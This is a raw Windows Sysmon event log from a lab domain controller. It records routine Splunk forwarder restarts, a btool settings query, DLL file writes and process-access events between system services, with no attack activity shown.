12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.706{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.720{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000007937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.691{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.691{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.691{266CAFBE-64E9-6064-BF00-00000000AE01}67246728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2796 10341000x80000000000000007929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-647D-6064-2F00-00000000AE01}27963752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.671{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2796C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000007921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.660{266CAFBE-647D-6064-2F00-00000000AE01}2796NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\conf-mutator.pidMD5=D49084353D18EC57574B16605BD22FFD,SHA256=F8C92956C3ED28F607E2105CB47C4C2E7BA1B2473EE74D08D16DEE2F2EBD40DB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.628{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2021-03-31 12:02:49.628 11241100x80000000000000007919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.628{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2021-03-31 12:02:49.628 11241100x80000000000000007918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.628{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2021-03-31 12:02:49.628 23542300x80000000000000007917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.582{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1200_POS4.jpgMD5=1E7D614892552BF17B2B08D30138EF64,SHA256=E37824373B3B7BA11537E7C32F933972B521C1FAF75D9A9585030F8DDDEFB304,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localEXE2021-03-31 12:02:49.504{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2021-03-31 12:02:49.504 23542300x80000000000000007915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.488{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=625BA39DDA6E6F3DB2D6F8B82DF785D6,SHA256=59D8A2D10C3F06D06ECE0B256BABCFAE89955A28DD4E775385AACBFFA52532D1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2021-03-31 12:02:49.473 11241100x80000000000000007913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2021-03-31 12:02:49.473 
11241100x80000000000000007912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2021-03-31 12:02:49.473 11241100x80000000000000007911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2021-03-31 12:02:49.473 11241100x80000000000000007910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2021-03-31 12:02:49.473 11241100x80000000000000007909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2021-03-31 12:02:49.473 11241100x80000000000000007908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2021-03-31 12:02:49.473 11241100x80000000000000007907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\ui\index.html2021-03-31 12:02:49.473 10341000x80000000000000007906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.410{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.286{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A2FCD3DD8ECE4AD2BCE4320AAAD5FC9B,SHA256=C72A8F444D0B6F328AE3462504A7DEB96D68363B6D27E072BF4FA98FC773D4F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.813{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 